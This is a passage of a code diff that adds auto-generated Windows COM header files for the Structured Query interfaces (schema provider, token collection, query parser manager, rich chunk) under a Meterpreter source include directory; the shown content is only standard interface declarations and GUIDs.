+            /* [in] */ __RPC__in_opt ITokenCollection *pTokenCollection,
+            /* [in] */ ULONG cTokensBegin,
+            /* [out] */ __RPC__out ULONG *pcTokensLength,
+            /* [out] */ __RPC__deref_out_opt LPWSTR *ppszValue) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct ISchemaProviderVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in ISchemaProvider * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in ISchemaProvider * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in ISchemaProvider * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *Entities )( 
+            __RPC__in ISchemaProvider * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][retval][out] */ __RPC__deref_out_opt void **pEntities);
+        
+        HRESULT ( STDMETHODCALLTYPE *RootEntity )( 
+            __RPC__in ISchemaProvider * This,
+            /* [retval][out] */ __RPC__deref_out_opt IEntity **pRootEntity);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetEntity )( 
+            __RPC__in ISchemaProvider * This,
+            /* [in] */ __RPC__in LPCWSTR pszEntityName,
+            /* [retval][out] */ __RPC__deref_out_opt IEntity **pEntity);
+        
+        HRESULT ( STDMETHODCALLTYPE *MetaData )( 
+            __RPC__in ISchemaProvider * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][retval][out] */ __RPC__deref_out_opt void **pMetaData);
+        
+        HRESULT ( STDMETHODCALLTYPE *Localize )( 
+            __RPC__in ISchemaProvider * This,
+            /* [in] */ LCID lcid,
+            /* [in] */ __RPC__in_opt ISchemaLocalizerSupport *pSchemaLocalizerSupport);
+        
+        HRESULT ( STDMETHODCALLTYPE *SaveBinary )( 
+            __RPC__in ISchemaProvider * This,
+            /* [in] */ __RPC__in LPCWSTR pszSchemaBinaryPath);
+        
+        HRESULT ( STDMETHODCALLTYPE *LookupAuthoredNamedEntity )( 
+            __RPC__in ISchemaProvider * This,
+            /* [in] */ __RPC__in_opt IEntity *pEntity,
+            /* [in] */ __RPC__in LPCWSTR pszInputString,
+            /* [in] */ __RPC__in_opt ITokenCollection *pTokenCollection,
+            /* [in] */ ULONG cTokensBegin,
+            /* [out] */ __RPC__out ULONG *pcTokensLength,
+            /* [out] */ __RPC__deref_out_opt LPWSTR *ppszValue);
+        
+        END_INTERFACE
+    } ISchemaProviderVtbl;
+
+    interface ISchemaProvider
+    {
+        CONST_VTBL struct ISchemaProviderVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define ISchemaProvider_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define ISchemaProvider_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define ISchemaProvider_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define ISchemaProvider_Entities(This,riid,pEntities)	\
+    ( (This)->lpVtbl -> Entities(This,riid,pEntities) ) 
+
+#define ISchemaProvider_RootEntity(This,pRootEntity)	\
+    ( (This)->lpVtbl -> RootEntity(This,pRootEntity) ) 
+
+#define ISchemaProvider_GetEntity(This,pszEntityName,pEntity)	\
+    ( (This)->lpVtbl -> GetEntity(This,pszEntityName,pEntity) ) 
+
+#define ISchemaProvider_MetaData(This,riid,pMetaData)	\
+    ( (This)->lpVtbl -> MetaData(This,riid,pMetaData) ) 
+
+#define ISchemaProvider_Localize(This,lcid,pSchemaLocalizerSupport)	\
+    ( (This)->lpVtbl -> Localize(This,lcid,pSchemaLocalizerSupport) ) 
+
+#define ISchemaProvider_SaveBinary(This,pszSchemaBinaryPath)	\
+    ( (This)->lpVtbl -> SaveBinary(This,pszSchemaBinaryPath) ) 
+
+#define ISchemaProvider_LookupAuthoredNamedEntity(This,pEntity,pszInputString,pTokenCollection,cTokensBegin,pcTokensLength,ppszValue)	\
+    ( (This)->lpVtbl -> LookupAuthoredNamedEntity(This,pEntity,pszInputString,pTokenCollection,cTokensBegin,pcTokensLength,ppszValue) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __ISchemaProvider_INTERFACE_DEFINED__ */
+
+
+#ifndef __ITokenCollection_INTERFACE_DEFINED__
+#define __ITokenCollection_INTERFACE_DEFINED__
+
+/* interface ITokenCollection */
+/* [unique][object][uuid][helpstring] */ 
+
+
+EXTERN_C const IID IID_ITokenCollection;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("22D8B4F2-F577-4adb-A335-C2AE88416FAB")
+    ITokenCollection : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE NumberOfTokens( 
+            __RPC__in ULONG *pCount) = 0;
+        
+        virtual /* [local] */ HRESULT STDMETHODCALLTYPE GetToken( 
+            /* [in] */ ULONG i,
+            /* [annotation][out] */ 
+            _Out_opt_  ULONG *pBegin,
+            /* [annotation][out] */ 
+            _Out_opt_  ULONG *pLength,
+            /* [annotation][out] */ 
+            _Outptr_opt_  LPWSTR *ppsz) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct ITokenCollectionVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in ITokenCollection * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in ITokenCollection * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in ITokenCollection * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *NumberOfTokens )( 
+            __RPC__in ITokenCollection * This,
+            __RPC__in ULONG *pCount);
+        
+        /* [local] */ HRESULT ( STDMETHODCALLTYPE *GetToken )( 
+            ITokenCollection * This,
+            /* [in] */ ULONG i,
+            /* [annotation][out] */ 
+            _Out_opt_  ULONG *pBegin,
+            /* [annotation][out] */ 
+            _Out_opt_  ULONG *pLength,
+            /* [annotation][out] */ 
+            _Outptr_opt_  LPWSTR *ppsz);
+        
+        END_INTERFACE
+    } ITokenCollectionVtbl;
+
+    interface ITokenCollection
+    {
+        CONST_VTBL struct ITokenCollectionVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define ITokenCollection_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define ITokenCollection_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define ITokenCollection_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define ITokenCollection_NumberOfTokens(This,pCount)	\
+    ( (This)->lpVtbl -> NumberOfTokens(This,pCount) ) 
+
+#define ITokenCollection_GetToken(This,i,pBegin,pLength,ppsz)	\
+    ( (This)->lpVtbl -> GetToken(This,i,pBegin,pLength,ppsz) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __ITokenCollection_INTERFACE_DEFINED__ */
+
+
+/* interface __MIDL_itf_structuredquery_0000_0012 */
+/* [local] */ 
+
+typedef /* [public][public][v1_enum] */ 
+enum __MIDL___MIDL_itf_structuredquery_0000_0012_0001
+    {
+        NEC_LOW	= 0,
+        NEC_MEDIUM	= ( NEC_LOW + 1 ) ,
+        NEC_HIGH	= ( NEC_MEDIUM + 1 ) 
+    } 	NAMED_ENTITY_CERTAINTY;
+
+
+
+extern RPC_IF_HANDLE __MIDL_itf_structuredquery_0000_0012_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_structuredquery_0000_0012_v0_0_s_ifspec;
+
+#ifndef __INamedEntityCollector_INTERFACE_DEFINED__
+#define __INamedEntityCollector_INTERFACE_DEFINED__
+
+/* interface INamedEntityCollector */
+/* [unique][object][uuid][helpstring] */ 
+
+
+EXTERN_C const IID IID_INamedEntityCollector;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("AF2440F6-8AFC-47d0-9A7F-396A0ACFB43D")
+    INamedEntityCollector : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE Add( 
+            /* [in] */ ULONG beginSpan,
+            /* [in] */ ULONG endSpan,
+            /* [in] */ ULONG beginActual,
+            /* [in] */ ULONG endActual,
+            /* [in] */ __RPC__in_opt IEntity *pType,
+            /* [in] */ __RPC__in LPCWSTR pszValue,
+            /* [in] */ NAMED_ENTITY_CERTAINTY certainty) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct INamedEntityCollectorVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in INamedEntityCollector * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in INamedEntityCollector * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in INamedEntityCollector * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *Add )( 
+            __RPC__in INamedEntityCollector * This,
+            /* [in] */ ULONG beginSpan,
+            /* [in] */ ULONG endSpan,
+            /* [in] */ ULONG beginActual,
+            /* [in] */ ULONG endActual,
+            /* [in] */ __RPC__in_opt IEntity *pType,
+            /* [in] */ __RPC__in LPCWSTR pszValue,
+            /* [in] */ NAMED_ENTITY_CERTAINTY certainty);
+        
+        END_INTERFACE
+    } INamedEntityCollectorVtbl;
+
+    interface INamedEntityCollector
+    {
+        CONST_VTBL struct INamedEntityCollectorVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define INamedEntityCollector_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define INamedEntityCollector_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define INamedEntityCollector_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define INamedEntityCollector_Add(This,beginSpan,endSpan,beginActual,endActual,pType,pszValue,certainty)	\
+    ( (This)->lpVtbl -> Add(This,beginSpan,endSpan,beginActual,endActual,pType,pszValue,certainty) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __INamedEntityCollector_INTERFACE_DEFINED__ */
+
+
+#ifndef __ISchemaLocalizerSupport_INTERFACE_DEFINED__
+#define __ISchemaLocalizerSupport_INTERFACE_DEFINED__
+
+/* interface ISchemaLocalizerSupport */
+/* [unique][object][uuid] */ 
+
+
+EXTERN_C const IID IID_ISchemaLocalizerSupport;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("CA3FDCA2-BFBE-4eed-90D7-0CAEF0A1BDA1")
+    ISchemaLocalizerSupport : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE Localize( 
+            /* [in] */ __RPC__in LPCWSTR pszGlobalString,
+            /* [retval][out] */ __RPC__deref_out_opt LPWSTR *ppszLocalString) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct ISchemaLocalizerSupportVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in ISchemaLocalizerSupport * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in ISchemaLocalizerSupport * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in ISchemaLocalizerSupport * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *Localize )( 
+            __RPC__in ISchemaLocalizerSupport * This,
+            /* [in] */ __RPC__in LPCWSTR pszGlobalString,
+            /* [retval][out] */ __RPC__deref_out_opt LPWSTR *ppszLocalString);
+        
+        END_INTERFACE
+    } ISchemaLocalizerSupportVtbl;
+
+    interface ISchemaLocalizerSupport
+    {
+        CONST_VTBL struct ISchemaLocalizerSupportVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define ISchemaLocalizerSupport_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define ISchemaLocalizerSupport_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define ISchemaLocalizerSupport_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define ISchemaLocalizerSupport_Localize(This,pszGlobalString,ppszLocalString)	\
+    ( (This)->lpVtbl -> Localize(This,pszGlobalString,ppszLocalString) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __ISchemaLocalizerSupport_INTERFACE_DEFINED__ */
+
+
+#ifndef __IQueryParserManager_INTERFACE_DEFINED__
+#define __IQueryParserManager_INTERFACE_DEFINED__
+
+/* interface IQueryParserManager */
+/* [unique][object][uuid] */ 
+
+
+EXTERN_C const IID IID_IQueryParserManager;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("A879E3C4-AF77-44fb-8F37-EBD1487CF920")
+    IQueryParserManager : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE CreateLoadedParser( 
+            /* [in] */ __RPC__in LPCWSTR pszCatalog,
+            /* [in] */ LANGID langidForKeywords,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][retval][out] */ __RPC__deref_out_opt void **ppQueryParser) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE InitializeOptions( 
+            /* [in] */ BOOL fUnderstandNQS,
+            /* [in] */ BOOL fAutoWildCard,
+            /* [in] */ __RPC__in_opt IQueryParser *pQueryParser) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE SetOption( 
+            /* [in] */ QUERY_PARSER_MANAGER_OPTION option,
+            /* [in] */ __RPC__in const PROPVARIANT *pOptionValue) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct IQueryParserManagerVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in IQueryParserManager * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in IQueryParserManager * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in IQueryParserManager * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *CreateLoadedParser )( 
+            __RPC__in IQueryParserManager * This,
+            /* [in] */ __RPC__in LPCWSTR pszCatalog,
+            /* [in] */ LANGID langidForKeywords,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][retval][out] */ __RPC__deref_out_opt void **ppQueryParser);
+        
+        HRESULT ( STDMETHODCALLTYPE *InitializeOptions )( 
+            __RPC__in IQueryParserManager * This,
+            /* [in] */ BOOL fUnderstandNQS,
+            /* [in] */ BOOL fAutoWildCard,
+            /* [in] */ __RPC__in_opt IQueryParser *pQueryParser);
+        
+        HRESULT ( STDMETHODCALLTYPE *SetOption )( 
+            __RPC__in IQueryParserManager * This,
+            /* [in] */ QUERY_PARSER_MANAGER_OPTION option,
+            /* [in] */ __RPC__in const PROPVARIANT *pOptionValue);
+        
+        END_INTERFACE
+    } IQueryParserManagerVtbl;
+
+    interface IQueryParserManager
+    {
+        CONST_VTBL struct IQueryParserManagerVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define IQueryParserManager_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define IQueryParserManager_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define IQueryParserManager_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define IQueryParserManager_CreateLoadedParser(This,pszCatalog,langidForKeywords,riid,ppQueryParser)	\
+    ( (This)->lpVtbl -> CreateLoadedParser(This,pszCatalog,langidForKeywords,riid,ppQueryParser) ) 
+
+#define IQueryParserManager_InitializeOptions(This,fUnderstandNQS,fAutoWildCard,pQueryParser)	\
+    ( (This)->lpVtbl -> InitializeOptions(This,fUnderstandNQS,fAutoWildCard,pQueryParser) ) 
+
+#define IQueryParserManager_SetOption(This,option,pOptionValue)	\
+    ( (This)->lpVtbl -> SetOption(This,option,pOptionValue) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __IQueryParserManager_INTERFACE_DEFINED__ */
+
+
+/* interface __MIDL_itf_structuredquery_0000_0015 */
+/* [local] */ 
+
+typedef struct tagHITRANGE
+    {
+    ULONG iPosition;
+    ULONG cLength;
+    } 	HITRANGE;
+
+
+
+extern RPC_IF_HANDLE __MIDL_itf_structuredquery_0000_0015_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_structuredquery_0000_0015_v0_0_s_ifspec;
+
+
+#ifndef __StructuredQuery1_LIBRARY_DEFINED__
+#define __StructuredQuery1_LIBRARY_DEFINED__
+
+/* library StructuredQuery1 */
+/* [version][uuid] */ 
+
+
+EXTERN_C const IID LIBID_StructuredQuery1;
+
+EXTERN_C const CLSID CLSID_QueryParser;
+
+#ifdef __cplusplus
+
+class DECLSPEC_UUID("B72F8FD8-0FAB-4dd9-BDBF-245A6CE1485B")
+QueryParser;
+#endif
+
+EXTERN_C const CLSID CLSID_NegationCondition;
+
+#ifdef __cplusplus
+
+class DECLSPEC_UUID("8DE9C74C-605A-4acd-BEE3-2B222AA2D23D")
+NegationCondition;
+#endif
+
+EXTERN_C const CLSID CLSID_CompoundCondition;
+
+#ifdef __cplusplus
+
+class DECLSPEC_UUID("116F8D13-101E-4fa5-84D4-FF8279381935")
+CompoundCondition;
+#endif
+
+EXTERN_C const CLSID CLSID_LeafCondition;
+
+#ifdef __cplusplus
+
+class DECLSPEC_UUID("52F15C89-5A17-48e1-BBCD-46A3F89C7CC2")
+LeafCondition;
+#endif
+
+EXTERN_C const CLSID CLSID_ConditionFactory;
+
+#ifdef __cplusplus
+
+class DECLSPEC_UUID("E03E85B0-7BE3-4000-BA98-6C13DE9FA486")
+ConditionFactory;
+#endif
+
+EXTERN_C const CLSID CLSID_Interval;
+
+#ifdef __cplusplus
+
+class DECLSPEC_UUID("D957171F-4BF9-4de2-BCD5-C70A7CA55836")
+Interval;
+#endif
+
+EXTERN_C const CLSID CLSID_QueryParserManager;
+
+#ifdef __cplusplus
+
+class DECLSPEC_UUID("5088B39A-29B4-4d9d-8245-4EE289222F66")
+QueryParserManager;
+#endif
+#endif /* __StructuredQuery1_LIBRARY_DEFINED__ */
+
+/* interface __MIDL_itf_structuredquery_0000_0016 */
+/* [local] */ 
+
+#endif /* WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP) */
+#pragma endregion
+
+
+extern RPC_IF_HANDLE __MIDL_itf_structuredquery_0000_0016_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_structuredquery_0000_0016_v0_0_s_ifspec;
+
+/* Additional Prototypes for ALL interfaces */
+
+unsigned long             __RPC_USER  BSTR_UserSize(     __RPC__in unsigned long *, unsigned long            , __RPC__in BSTR * ); 
+unsigned char * __RPC_USER  BSTR_UserMarshal(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in BSTR * ); 
+unsigned char * __RPC_USER  BSTR_UserUnmarshal(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out BSTR * ); 
+void                      __RPC_USER  BSTR_UserFree(     __RPC__in unsigned long *, __RPC__in BSTR * ); 
+
+unsigned long             __RPC_USER  LPSAFEARRAY_UserSize(     __RPC__in unsigned long *, unsigned long            , __RPC__in LPSAFEARRAY * ); 
+unsigned char * __RPC_USER  LPSAFEARRAY_UserMarshal(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in LPSAFEARRAY * ); 
+unsigned char * __RPC_USER  LPSAFEARRAY_UserUnmarshal(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out LPSAFEARRAY * ); 
+void                      __RPC_USER  LPSAFEARRAY_UserFree(     __RPC__in unsigned long *, __RPC__in LPSAFEARRAY * ); 
+
+unsigned long             __RPC_USER  BSTR_UserSize64(     __RPC__in unsigned long *, unsigned long            , __RPC__in BSTR * ); 
+unsigned char * __RPC_USER  BSTR_UserMarshal64(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in BSTR * ); 
+unsigned char * __RPC_USER  BSTR_UserUnmarshal64(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out BSTR * ); 
+void                      __RPC_USER  BSTR_UserFree64(     __RPC__in unsigned long *, __RPC__in BSTR * ); 
+
+unsigned long             __RPC_USER  LPSAFEARRAY_UserSize64(     __RPC__in unsigned long *, unsigned long            , __RPC__in LPSAFEARRAY * ); 
+unsigned char * __RPC_USER  LPSAFEARRAY_UserMarshal64(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in LPSAFEARRAY * ); 
+unsigned char * __RPC_USER  LPSAFEARRAY_UserUnmarshal64(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out LPSAFEARRAY * ); 
+void                      __RPC_USER  LPSAFEARRAY_UserFree64(     __RPC__in unsigned long *, __RPC__in LPSAFEARRAY * ); 
+
+/* end of Additional Prototypes */
+
+#ifdef __cplusplus
+}
+#endif
+
+#endif
+
+

--- a/c/meterpreter/source/extra_includes/StructuredQueryCondition.h
+++ b/c/meterpreter/source/extra_includes/StructuredQueryCondition.h
@@ -1,0 +1,770 @@
+
+
+/* this ALWAYS GENERATED file contains the definitions for the interfaces */
+
+
+ /* File created by MIDL compiler version 8.01.0622 */
+/* @@MIDL_FILE_HEADING(  ) */
+
+
+
+/* verify that the <rpcndr.h> version is high enough to compile this file*/
+#ifndef __REQUIRED_RPCNDR_H_VERSION__
+#define __REQUIRED_RPCNDR_H_VERSION__ 500
+#endif
+
+/* verify that the <rpcsal.h> version is high enough to compile this file*/
+#ifndef __REQUIRED_RPCSAL_H_VERSION__
+#define __REQUIRED_RPCSAL_H_VERSION__ 100
+#endif
+
+#include "rpc.h"
+#include "rpcndr.h"
+
+#ifndef __RPCNDR_H_VERSION__
+#error this stub requires an updated version of <rpcndr.h>
+#endif /* __RPCNDR_H_VERSION__ */
+
+#ifndef COM_NO_WINDOWS_H
+#include "windows.h"
+#include "ole2.h"
+#endif /*COM_NO_WINDOWS_H*/
+
+#ifndef __structuredquerycondition_h__
+#define __structuredquerycondition_h__
+
+#if defined(_MSC_VER) && (_MSC_VER >= 1020)
+#pragma once
+#endif
+
+/* Forward Declarations */ 
+
+#ifndef __IRichChunk_FWD_DEFINED__
+#define __IRichChunk_FWD_DEFINED__
+typedef interface IRichChunk IRichChunk;
+
+#endif 	/* __IRichChunk_FWD_DEFINED__ */
+
+
+#ifndef __ICondition_FWD_DEFINED__
+#define __ICondition_FWD_DEFINED__
+typedef interface ICondition ICondition;
+
+#endif 	/* __ICondition_FWD_DEFINED__ */
+
+
+#ifndef __ICondition2_FWD_DEFINED__
+#define __ICondition2_FWD_DEFINED__
+typedef interface ICondition2 ICondition2;
+
+#endif 	/* __ICondition2_FWD_DEFINED__ */
+
+
+/* header files for imported files */
+#include "oaidl.h"
+#include "ocidl.h"
+#include "propidl.h"
+
+#ifdef __cplusplus
+extern "C"{
+#endif 
+
+
+/* interface __MIDL_itf_structuredquerycondition_0000_0000 */
+/* [local] */ 
+
+#include <winapifamily.h>
+typedef /* [v1_enum] */ 
+enum tagCONDITION_TYPE
+    {
+        CT_AND_CONDITION	= 0,
+        CT_OR_CONDITION	= ( CT_AND_CONDITION + 1 ) ,
+        CT_NOT_CONDITION	= ( CT_OR_CONDITION + 1 ) ,
+        CT_LEAF_CONDITION	= ( CT_NOT_CONDITION + 1 ) 
+    } 	CONDITION_TYPE;
+
+typedef /* [v1_enum] */ 
+enum tagCONDITION_OPERATION
+    {
+        COP_IMPLICIT	= 0,
+        COP_EQUAL	= ( COP_IMPLICIT + 1 ) ,
+        COP_NOTEQUAL	= ( COP_EQUAL + 1 ) ,
+        COP_LESSTHAN	= ( COP_NOTEQUAL + 1 ) ,
+        COP_GREATERTHAN	= ( COP_LESSTHAN + 1 ) ,
+        COP_LESSTHANOREQUAL	= ( COP_GREATERTHAN + 1 ) ,
+        COP_GREATERTHANOREQUAL	= ( COP_LESSTHANOREQUAL + 1 ) ,
+        COP_VALUE_STARTSWITH	= ( COP_GREATERTHANOREQUAL + 1 ) ,
+        COP_VALUE_ENDSWITH	= ( COP_VALUE_STARTSWITH + 1 ) ,
+        COP_VALUE_CONTAINS	= ( COP_VALUE_ENDSWITH + 1 ) ,
+        COP_VALUE_NOTCONTAINS	= ( COP_VALUE_CONTAINS + 1 ) ,
+        COP_DOSWILDCARDS	= ( COP_VALUE_NOTCONTAINS + 1 ) ,
+        COP_WORD_EQUAL	= ( COP_DOSWILDCARDS + 1 ) ,
+        COP_WORD_STARTSWITH	= ( COP_WORD_EQUAL + 1 ) ,
+        COP_APPLICATION_SPECIFIC	= ( COP_WORD_STARTSWITH + 1 ) 
+    } 	CONDITION_OPERATION;
+
+#pragma region Desktop Family
+#if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP)
+
+
+extern RPC_IF_HANDLE __MIDL_itf_structuredquerycondition_0000_0000_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_structuredquerycondition_0000_0000_v0_0_s_ifspec;
+
+#ifndef __IRichChunk_INTERFACE_DEFINED__
+#define __IRichChunk_INTERFACE_DEFINED__
+
+/* interface IRichChunk */
+/* [unique][uuid][object] */ 
+
+
+EXTERN_C const IID IID_IRichChunk;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("4FDEF69C-DBC9-454e-9910-B34F3C64B510")
+    IRichChunk : public IUnknown
+    {
+    public:
+        virtual /* [local] */ HRESULT STDMETHODCALLTYPE GetData( 
+            /* [annotation][unique][out] */ 
+            _Out_opt_  ULONG *pFirstPos,
+            /* [annotation][unique][out] */ 
+            _Out_opt_  ULONG *pLength,
+            /* [annotation][unique][out] */ 
+            _Outptr_opt_result_maybenull_  LPWSTR *ppsz,
+            /* [annotation][unique][out] */ 
+            _Out_opt_  PROPVARIANT *pValue) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct IRichChunkVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in IRichChunk * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in IRichChunk * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in IRichChunk * This);
+        
+        /* [local] */ HRESULT ( STDMETHODCALLTYPE *GetData )( 
+            IRichChunk * This,
+            /* [annotation][unique][out] */ 
+            _Out_opt_  ULONG *pFirstPos,
+            /* [annotation][unique][out] */ 
+            _Out_opt_  ULONG *pLength,
+            /* [annotation][unique][out] */ 
+            _Outptr_opt_result_maybenull_  LPWSTR *ppsz,
+            /* [annotation][unique][out] */ 
+            _Out_opt_  PROPVARIANT *pValue);
+        
+        END_INTERFACE
+    } IRichChunkVtbl;
+
+    interface IRichChunk
+    {
+        CONST_VTBL struct IRichChunkVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define IRichChunk_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define IRichChunk_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define IRichChunk_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define IRichChunk_GetData(This,pFirstPos,pLength,ppsz,pValue)	\
+    ( (This)->lpVtbl -> GetData(This,pFirstPos,pLength,ppsz,pValue) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+/* [call_as] */ HRESULT STDMETHODCALLTYPE IRichChunk_RemoteGetData_Proxy( 
+    __RPC__in IRichChunk * This,
+    /* [out] */ __RPC__out ULONG *pFirstPos,
+    /* [out] */ __RPC__out ULONG *pLength,
+    /* [out] */ __RPC__deref_out_opt LPWSTR *ppsz,
+    /* [out] */ __RPC__out PROPVARIANT *pValue);
+
+
+void __RPC_STUB IRichChunk_RemoteGetData_Stub(
+    IRpcStubBuffer *This,
+    IRpcChannelBuffer *_pRpcChannelBuffer,
+    PRPC_MESSAGE _pRpcMessage,
+    DWORD *_pdwStubPhase);
+
+
+
